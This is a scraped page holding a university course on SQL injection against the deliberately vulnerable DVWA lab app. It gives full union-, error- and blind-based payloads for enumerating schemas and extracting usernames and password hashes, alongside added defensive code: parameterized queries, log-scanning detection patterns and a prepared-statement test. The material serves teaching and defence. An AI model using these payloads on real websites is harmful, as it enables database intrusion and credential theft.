What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
 
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptxChapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptx
 

Sql injection course made by Cristian Alexandrescu

University of Craiova
Faculty of Automatics, Computers and Electronics
SQL injection
-course-
Cristian Alexandrescu

Contents
1. Introduction ..... 3
1.1 Database ..... 3
1.2 SQL ..... 3
1.3 Simple queries of SQL ..... 3
1.4 What are SQL injections? ..... 3
1.5 What can cause those injections? ..... 3
1.6 How can SQL injection affect the system administrators (root)? ..... 4
1.7 How can SQL injection affect the website administrator? ..... 4
1.8 How can SQL injection affect the website users? ..... 4
1.9 How can SQL injection affect the web page visitors? ..... 4
1.10 How can we do SQL injection? ..... 4
2. Classification ..... 5
2.1 Union based ..... 5
2.2 Error based ..... 5
2.3 Blind based ..... 5
3. Possible scenario ..... 6
3.1 Types of SQL queries ..... 6
3.2 Union based ..... 9
3.3 Error based ..... 15
3.4 Blind based ..... 19
4. Methods of protection ..... 25
5. Conclusions ..... 26
Bibliography
1. Introduction

In the last year this type of vulnerability has become more frequent on websites. First we need to know what this vulnerability represents, how to exploit it and how to protect against it.

1.1 Database

A database is a collection of data. From the perspective of a website, the database is used to store different information such as usernames, passwords, web pages, information about the website and many other things. Examples of databases (DB servers): MySQL, MSSQL, Oracle, PostgreSQL, SQLite.

1.2 SQL

Structured Query Language is known as SQL. If we want to communicate with the database we use SQL queries.

1.3 Simple queries of SQL

SELECT * FROM table_name;

This instruction outputs the information from the table, including the names of the columns. Example:

SELECT * FROM users;

INSERT INTO users(username, password) VALUES('user', 'pass');

We use it to insert the values user and pass into the table users, in the columns username and password.

1.4 What are SQL injections?

SQL injection is a technique of injecting malicious code into web applications. In the following labs I will show different types of possible attacks on a website. These sequences of malicious SQL code are inserted into a field, sent either by GET or by POST, and are then executed by the server itself.

1.5 What can cause those injections?

Through this method an unauthorized person obtains access to the database of the website; thus the attacker gets access to all the detailed information in the database.

1.6 How can SQL injection affect the system administrators (root)?

Usually one error leads to another error, and so on, until a possible attacker succeeds in entering the server. From there things change drastically: once a malicious file is uploaded on the server, the attacker can control the website as well as the server.

1.7 How can SQL injection affect the website administrator?

The website administrator can lose access to the admin panel: the attacker can change the password and modify the e-mail in the database so that the admin panel or the website cannot be recovered.

1.8 How can SQL injection affect the website users?

This is the worst part, because once the website has been taken over, the website users will receive from the "administrator" a notification saying that they must access an unknown page with malicious code pretending to be something else, which leads to the users also getting infected.

1.9 How can SQL injection affect the web page visitors?

Let us assume that the server was already compromised and the attacker has modified the structure of the web page. Once a visitor enters the website, the attacker can steal the visitor's cookies, infect other people, etc.

1.10 How can we do SQL injection?

There is the automated method, with programs like sqlmap, mole, havij etc. These are not very efficient because they use only predefined queries, so if the injection is complicated the tool does not know what to do, quits and reports the site as not vulnerable when in fact it is. The second method is manual injection, which we will discuss within this laboratory, together with other possible types of attacks on a website in the following laboratories.

2. Classification

To date, 3 main methods of SQL injection have been discovered:

2.1 Union based

With this method we search for the number of columns that the current table has, and by applying the following command we obtain certain "errors" that we can exploit in our favour:

union select 1,2,3,4,5,… (the number of columns that the current table has)

We can obtain information such as: PHP version, the user with which the SQL queries are made (many times [person/website name]@localhost), database name, system user, permissions on the server, as well as any information from the database. The commands for a custom union-based query (because everything we discuss here will be done manually) I will show in the next section, in which I will demonstrate a possible attack on a server (in our case the internal server).

2.2 Error based

It is the second method of SQLi (SQL injection). Unlike union based, with this method we can output only a single piece of information at a time, through a SQL error. Commands in error based are quite complex, so we cannot memorize them by heart. What I want you to remember is that union based and error based commands output the same information; the difference is that one is quicker than the other.

2.3 Blind based

The last technique in the series of SQLi "outputs" the information more slowly than the first two, because the number of queries may increase significantly depending on the information in the database. The queries are similar to a game of true or false: if the query is true, the server outputs the website normally; if it is false, the server outputs only parts of the website.

I will give examples for each type in the next section, the possible scenario, where I will explain in detail every step that I take to get to the wanted information from the database.
3. Possible scenario

In this scenario I will use the Damn Vulnerable Web App (DVWA), which is written in PHP. This tool was created for teachers, students and anyone who wants to learn more about application security in a classroom environment. I will use it to prove the concept of SQL injection.

First of all, when we start an injection of one of the 3 types, we need to close the query so that the next sequence executes the way we want! If we want to see the sequence of code in real time we can add the following PHP code:

$html .= '<pre>' . $getid . '<br></pre>';

3.1 Types of SQL queries

3.1.1 String based

Suppose that we have the following sequence:

$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

To execute commands we need to close the sequence correctly so that the code gets executed correctly! How do we do that? We try something simple: ' (a single quote).

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

What does this mean? It means that we have a MySQL database. And why do we get that error? Let us understand better!

select first_name, last_name from users where user_id=''';

At the end of the sequence we put --+ (-- is a comment, and + stands for the space that the string-based form needs after the comment). (!!! It also works with --+- or -- -.)

select first_name, last_name from users where user_id=''-- ';

When we find that id=1'--+ works correctly, we can continue the injection.

3.1.2 Integer based

$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";

We try, like last time, ' (a single quote).

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

If we put id=1'--+ we get the following error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''--' at line 1

This means we cannot use string based! What happens when we take out the '? With id=1--+ or even id=1-- we see that the sequence executes correctly and the page has no errors or missing text.

select first_name, last_name from users where user_id=1--;
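The two query shapes above, string based and integer based, are vulnerable for the same reason: the value of id is pasted into the statement text. The following is an added example (not DVWA's code and not part of the course) that puts the concatenated query from section 3.1.1 next to its parameterized form and a type-checked integer form. SQLite stands in for MySQL (it also treats -- as a comment), the users rows are constructed sample data, and the probe strings are the page's own payloads after URL decoding, where the + of --+ has become a space.

```python
"""Concatenated vs. parameterized lookup for the DVWA-style users query.
Added example, not DVWA's or the course's own code. SQLite stands in for
MySQL; the users rows are constructed sample data.
"""
import re
import sqlite3


def make_db():
    """In-memory table shaped like DVWA's users query (first_name, last_name); sample rows only."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Pablo", "Picasso")],
    )
    return con


def lookup_vulnerable(con, user_id):
    # Mirrors  $getid = "SELECT ... WHERE user_id = '$id'": whatever the client sends is
    # parsed as SQL, so a quote closes the literal and '-- ' hides the trailing quote.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, user_id):
    # Placeholder binding: the value travels separately from the statement text, so
    # quotes, comments and UNION inside it are compared as data and never parsed.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


def lookup_integer(con, raw_id):
    # Integer-based form (section 3.1.2): validate the type before SQL sees the value.
    # Returns None for anything that is not a plain decimal number.
    if not re.fullmatch(r"\d+", raw_id):
        return None
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "-1' union select 1,2-- "  # the page's union probe, URL-decoded
    print("concatenated :", lookup_vulnerable(db, payload))  # [(1, 2)]: attacker-chosen row
    print("parameterized:", lookup_safe(db, payload))        # []: compared as a literal id
    print("integer      :", lookup_integer(db, "1-- "))      # None: rejected before SQL
```

The parameterized form does not "filter" anything: the database receives the statement and the value through separate channels, so there is no string for a quote or comment to close. The integer form is worth keeping as well, because a rejected value can be logged at the application layer before any query is run.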
3.1.3 Multiple types

The query could differ from the first 2 types presented before. This means that it may have to be closed with "--, ')--, )--, ))--, ")--, ")- -, '))-- etc. So the query can take multiple forms; the main idea is that only one of them will work! Some examples of SQL queries:

select * from table_name where id=1
select * from table_name where id='1'
select * from table_name where id="1"
select * from table_name where id=(1)
select * from table_name where id=('1')
select * from table_name where id=("1")

3.2 Union based

The following methods are examples for string based and integer based only. As the name says, this type of injection uses the SQL command UNION, which combines the results of two or more SELECT statements, as in the following example:

SELECT column_name(s) FROM table1 UNION SELECT column_name(s) FROM table2;

We check the functionality of order by. How does order by work? It is used for sorting the results obtained through SELECT.

SELECT column_name, column_name FROM table_name ORDER BY column_name ASC|DESC, column_name ASC|DESC;

order by 1 (if it works we try 2, 3, …, N, where N is the number of columns of the actual table).
Let us assume we reach 2 (order by 2). I tried 2 and it worked; if I try order by 3 we obtain an error.

Unknown column '3' in 'order clause'

Why do we receive an error with order by 3? The table we are using now has only 2 columns that are used in the query. Now we must use union select to inject the commands through which we find the information in the database.

union select 1,2

Why do we write 1,2 instead of 1,2,3,4? Like I said before, in our table only 2 columns are used by the query:

SELECT first_name, last_name FROM users

We already know the table, but we assume that we do not. We obtain 1 and 2 – those are the vulnerable columns.

(!!! If it does not output anything and we do not get any errors, we give the parameter a number that does not exist in the database, or we negate the condition.) For example:

id=1' and 0 union select 1,2--+
id=1' and 1=0 union select 1,2--+
id=-1' union select 1,2--+
id=0' union select 1,2--+
id=99999' union select 1,2--+

We modify one of the outputted vulnerable columns to check the version of the running MySQL server. The purpose is to identify the version of the DBMS in order to search for known vulnerabilities of that version.

union select 1,version()

We get 5.6.24 – this is the version in my example; on each server it depends on the running MySQL server. On CSIRT there are known/declared/registered vulnerabilities for every version of the MySQL DBMS. Those can later be exploited with the help of other attack techniques/instruments.

We check the name of the database. The purpose is to get the current database in which the application runs.

union select 1,database()

We get the name of the database: dvwa.

Next we obtain all the tables from the database, with the purpose of identifying a table that may hold an administrator account. We use the following SQL fragments to obtain all tables from the current database:

group_concat(table_name) – which we put in the place of database()

from information_schema.tables where table_schema=database() – which we add at the end of the SQL command:

union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

How do the previous commands work? group_concat() is a function that returns a string by concatenating the non-null values of a group. information_schema.tables lists all the existing tables from all the databases on the server. table_schema is the column that holds the database name, so we set it to the database from which we want specific information. We obtain guestbook and users.

To extract information from users we modify the command: we replace table_name with column_name and at the end we write

from information_schema.columns where table_name=0x7573657273

where 0x7573657273 is users written in hexadecimal – for efficiency we use the Hackbar add-on for Firefox. We could have used users directly, but we are not sure whether the current SQL user can read or write the restricted files of the server. We find user_id, first_name, last_name, user, password, avatar, USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS.

To output the information from the columns user and password we have the following command:

union select 1,group_concat(0x3c62723e,user,0x3a3a,password) from users

where 0x3c62723e is <br> in HTML and 0x3a3a is ::. We receive the wanted information from the 2 columns (user and password) of the table users.

Let us assume we have an admin table with the columns username and password. The command will look like this:

union select 1,group_concat(username,0x0a,password),3 from admin

Executing the query we receive the admin account and the password! If we look closely, we will see that the password is a hash, maybe MD5 or SHA-1 – a one-way hash. What does this mean? A password once hashed cannot be reversed, which means it is hard to break, so we can try a dictionary attack, rainbow tables and/or even a brute-force attack.
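Every step of the union-based walk-through above leaves a distinctive trace in the web server's access log: order by N with an increasing N, union select, version(), information_schema and group_concat, and a quote immediately followed by a comment. The following is an added example (not from the course and not DVWA's code) that scans Apache combined-format log lines for exactly those patterns after URL decoding; the six log lines are constructed for the example and the rule names are my own.

```python
"""Scan web-server access logs for the union-based SQLi probes shown in section 3.2.
Added example, not part of the course. Sample log lines are constructed.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample lines (Apache combined format, trimmed). Not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2015:10:01:02 +0300] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4512
10.0.0.9 - - [12/May/2015:10:01:15 +0300] "GET /dvwa/vulnerabilities/sqli/?id=1%27--+&Submit=Submit HTTP/1.1" 200 4512
10.0.0.9 - - [12/May/2015:10:01:20 +0300] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20order%20by%203--+&Submit=Submit HTTP/1.1" 200 3980
10.0.0.9 - - [12/May/2015:10:01:31 +0300] "GET /dvwa/vulnerabilities/sqli/?id=-1%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+&Submit=Submit HTTP/1.1" 200 4602
10.0.0.9 - - [12/May/2015:10:02:05 +0300] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20and%20substring(@@version,1,1)=4--+&Submit=Submit HTTP/1.1" 200 4100
10.0.0.7 - - [12/May/2015:10:02:40 +0300] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Rule names are my own; each pattern corresponds to a step of the walk-through.
RULES = {
    "union-select":   re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "order-by-probe": re.compile(r"\border\s+by\s+\d+"),
    "schema-enum":    re.compile(r"\binformation_schema\.|\bgroup_concat\s*\("),
    "version-probe":  re.compile(r"@@version|\bversion\s*\(\s*\)"),
    "quote-comment":  re.compile(r"'\s*(?:--|#)"),
}


def normalize(url):
    """One URL decode ('+' becomes a space, as the page notes), lowercase,
    inline /* */ comments dropped, whitespace collapsed."""
    s = unquote_plus(url).lower()
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s)


def scan_log(text):
    """Return [(line_number, client_ip, [matched rule names]), ...] for suspicious requests."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real deployment would count these
        query = normalize(m.group("url"))
        matched = [name for name, rx in RULES.items() if rx.search(query)]
        if matched:
            hits.append((number, m.group("ip"), matched))
    return hits


if __name__ == "__main__":
    for number, ip, rules in scan_log(SAMPLE_LOG):
        print(f"line {number}: {ip} -> {', '.join(rules)}")
```

The scan decodes exactly once, which is what the server does; a request that needs two decodes to look like SQL would not have worked against the application either. Correlating hits by client address, as the output above shows for 10.0.0.9, is what turns single matches into the "order by 1, 2, 3 then union select" sequence the section describes.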
  • 15. 15 3.3 Error based In his method, like I said before, we can output one piece of information at a time! This means: and(select 1 from(select count(*),concat((select (select concat(version(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a) Duplicate entry '5.6.24' for key 'group_key' If we wish to output the name of the database, we modify the version() with database(). and(select 1 from(select count(*),concat((select (select concat(database(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a) If we want to reach the tables, we must change the query a little. and(select 1 from(select count(*),concat((select (select (select concat(table_name,0x00) from information_schema.tables where table_schema=database() limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  • 16. 16 Duplicate entry '~guestbook' for key 'group_key' To get to the next table we modify the increment the limit. (!!! If the query works for limit 5,1 but not for limit 6,1 this means there are only 6 tables in that database. This rule works also for determining the number of columns or number of records from a table.) and(select 1 from(select count(*),concat((select (select (select concat(table_name,0x00) from information_schema.tables where table_schema=database() limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) When we try limit 2,1 we receive a valid web page without any errors this is because we try to exploit the information from the database using SQL errors and this means that we already know there are only 2 tables in the database named dvwa!
We can see what columns are inside the table named users with the next query:

and(select 1 from(select count(*),concat((select (select (select concat(column_name,0x00) from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

where 0x7573657273 = users. We continue to increment the limit of the columns to search for the user and password columns, the same as in union based:

limit 1,1
limit 2,1

And so on, depending on how many columns we want to get...
and(select 1 from(select count(*),concat((select (select (select concat(column_name,0x00) from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 3,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

The query to obtain the first record from the table users using the columns user and password is:

and (select 1 from(select count(*),concat((select concat(user,0x3a,password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

For the next records we modify the limit as in the previous query!

limit 1,1

And so on, depending on how many records you want to get...
3.4 Blind based

This method is met very frequently and it is very hard to exploit manually because of the time needed to create the queries. In the following I will show the method without carrying it through to the end, because it would take a lot of time even for this small database! To simply check whether blind based injection is present on the server, we can inject a true condition such as

id=1' and 1=1--+

and if we get the same page, this can be a blind based injection. To be sure we try and 1=0. If the page loads without some parts of the text, because 1 is not equal to 0 (while 1 is equal to 1), then the server answers our questions with true or false (true if the page loads normally, false otherwise). We ask the server whether it has DBMS version 4 (even though I know it is 5):

and substring(@@version,1,1)=4
A part of the text disappears; now we try with 5:

and substring(@@version,1,1)=5

It loads normally, which means we have version 5 of the DBMS. If we want to get the information from the database, we need to understand how the server will answer our queries. If we want to get the tables, we first need to understand the ASCII table. Why do we need ASCII? This is how blind based injection works: using the SQL ascii() function. If we look at the ASCII table on the next page, we see that:

'a' = 97, 'A' = 65, 'g' = 103

And the examples can continue...
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>65

We want to know whether the first letter of the first table name is greater than A (65 = 'A' in ASCII). We keep raising the value until we get the following result:

and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<104

(110 = 'n')
We almost found the first letter (even though we already know it from union based and error based: the table name is "guestbook").

and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103

For the next letter we see that u is 117, so we modify the query a little:

and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=117
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=101
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))=116
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))=98
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),7,1))=111
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),8,1))=111
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),9,1))=107

Now we found "guestbook". I will not repeat the same steps for the table "users", which we already know; the process is the same.

and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=115

And so on until the end... We know only the name of the table, users, without any other information. The next part involves guessing the columns; we cannot be 100% sure of guessing them, but for learning purposes I already know the columns. We assume that we have the column username, so we will try to see if it exists.

and (SELECT substring(concat(1,username),1,1) from users limit 0,1)=1

It seems that username does not exist in the table users.

and (SELECT substring(concat(1,user),1,1) from users limit 0,1)=1
It works, because the web page loads normally, but what if we try password?

and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1

It works as well, and now we need to find the first column of the table users (usually id or user_id).

and (SELECT substring(concat(1,id),1,1) from users limit 0,1)=1

Unknown column 'id' in 'field list'

and (SELECT substring(concat(1,user_id),1,1) from users limit 0,1)=1

Now we need to find the administrator account and the password:

and ascii(substring((SELECT concat(user) from users where user_id=1),1,1))=97
and ascii(substring((SELECT concat(user) from users where user_id=1),2,1))=100
and ascii(substring((SELECT concat(user) from users where user_id=1),3,1))=109
and ascii(substring((SELECT concat(user) from users where user_id=1),4,1))=105
and ascii(substring((SELECT concat(user) from users where user_id=1),5,1))=110

(admin = 97,100,109,105,110)

and ascii(substring((SELECT concat(password) from users where user_id=1),1,1))=53
and ascii(substring((SELECT concat(password) from users where user_id=1),2,1))=102

We continue to search until we find all the information in the password column.
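From the defender's side, the three families of payloads walked through in sections 3.2 to 3.4 leave recognisable traces in web server access logs. As an added example that is not part of the original course, the following Python script flags those shapes in constructed log lines and also spots blind enumeration, where one client repeats the same query changing only the offset and the compared ASCII value; the log format, the IP addresses and the vuln.php path are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Signatures matching the payload shapes from sections 3.2 to 3.4 (case-insensitive).
SIGNATURES = {
    "union": re.compile(r"union\s+(all\s+)?select", re.I),
    "error": re.compile(r"floor\(rand\(0\)\*2\)|group\s+by\s+x\b", re.I),
    "blind": re.compile(r"ascii\(substring\(|substring\(@@version", re.I),
    "schema": re.compile(r"information_schema\.", re.I),
}
# Combined log format; only the query string is visible here, POST bodies are not logged.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<path>\S+)')

def classify(path):
    """Return the set of signature names found in a URL-decoded request path."""
    decoded = unquote_plus(path)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def blind_key(path):
    """Replace every number so that blind requests differing only in their
    limit/substring offsets or compared ASCII value collapse to one key."""
    return re.sub(r"\d+", "N", unquote_plus(path))

def analyse(lines, blind_threshold=5):
    """Return (hits, enumerators): (ip, families) per flagged request, and the
    IPs that repeated one blind-shaped query at least blind_threshold times."""
    hits, shapes = [], defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, path = m.group("ip"), m.group("path")
        families = classify(path)
        if families:
            hits.append((ip, families))
        if "blind" in families:
            shapes[ip][blind_key(path)] += 1
    enumerators = sorted(ip for ip, c in shapes.items() if max(c.values()) >= blind_threshold)
    return hits, enumerators

# Constructed access-log lines (documentation IPs) carrying the course's payloads.
_PFX = '203.0.113.%d - - [01/Jan/2024:10:00:%02d +0000] "GET %s HTTP/1.1" 200 512'
BLIND = ("/vuln.php?id=1%%27+and+ascii(substring((select+table_name+from+"
         "information_schema.tables+where+table_schema=database()+limit+0,1),%d,1))=%d")
SAMPLE_LOG = [
    _PFX % (5, 0, "/vuln.php?id=1"),
    _PFX % (7, 1, "/vuln.php?id=1%27+union+select+1,group_concat(0x3c62723e,user,0x3a3a,password)+from+users--+"),
    _PFX % (8, 2, "/vuln.php?id=1%27+and(select+1+from(select+count(*),concat((select+version()),"
                  "floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+"),
] + [_PFX % (9, 3 + i, BLIND % (i, 97)) for i in range(1, 7)]
```

Running analyse(SAMPLE_LOG) flags the union and error requests once each and reports 203.0.113.9 as an enumerating client, since its six requests collapse to a single normalised shape.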
4. Methods of protection

http://php.net/manual/en/mysqli.quickstart.prepared-statements.php
http://php.net/manual/en/pdo.prepare.php
https://docs.oracle.com/javase/7/docs/api/java/sql/PreparedStatement.html
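The three references above all describe prepared statements. As an added illustration that is neither the course's nor those libraries' code, the following Python script uses the standard sqlite3 module as a stand-in for the mysqli/PDO/JDBC APIs linked above, puts the string-built lookup exploited throughout this course next to its parameterised form, and runs the section 3.4 true/false check against both; the table layout and the placeholder hash are constructed.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the 'users' table from section 3;
    the hash value is a placeholder, not a real credential."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', '<placeholder-hash>')")
    return conn

def lookup_vulnerable(conn, user_input):
    """The pattern exploited in this course: user input concatenated into the SQL text."""
    sql = "SELECT user FROM users WHERE user_id = '%s'" % user_input
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, user_input):
    """Prepared statement: the input is bound as a value and never parsed as SQL."""
    sql = "SELECT user FROM users WHERE user_id = ?"
    return [row[0] for row in conn.execute(sql, (user_input,))]

def responds_to_boolean_probe(conn, lookup):
    """Defensive self-test built on the true/false check from section 3.4: if the
    answers for 'and 1=1' and 'and 1=0' differ, the input reached the SQL parser."""
    true_case = lookup(conn, "1' and 1=1 -- ")
    false_case = lookup(conn, "1' and 1=0 -- ")
    return true_case != false_case

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", responds_to_boolean_probe(db, lookup_vulnerable))  # True
    print("prepared:  ", responds_to_boolean_probe(db, lookup_safe))        # False
```

With the prepared statement both probe inputs are compared as literal strings against user_id, so both return no rows and the page would look identical, which is exactly what denies a blind based attacker the true/false oracle.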
5. Conclusions

As I said before in this course, this type of vulnerability is very easy to exploit and exists on many websites today. SQLi belongs to the web application vulnerabilities that can be exploited very easily on small websites whose developers are not prepared to protect their server, their web pages and their information from an attack of this type. However, this kind of vulnerability is not limited to small web pages; it can also be found on many important websites from all around the world. A student said the following: "If we want to be protected from SQLi we need to set the parameter on POST because it would not appear directly on the web page or in the browser URL." To clarify this problem, I asked the following: "Do you think this would be enough to protect you from a possible attacker? Maybe if a script kiddie tried this, he would not succeed, but if an experienced hacker targeted your website he would most certainly penetrate it. (A script kiddie is a person with little knowledge about security who uses tools made by experienced hackers to destroy websites or servers.) Maybe a Web Application Firewall would stop you from running some commands like: union, select, union select, etc., but it most certainly cannot protect you from new queries made by people with experience in this domain." As long as SQL exists, SQLi will also exist!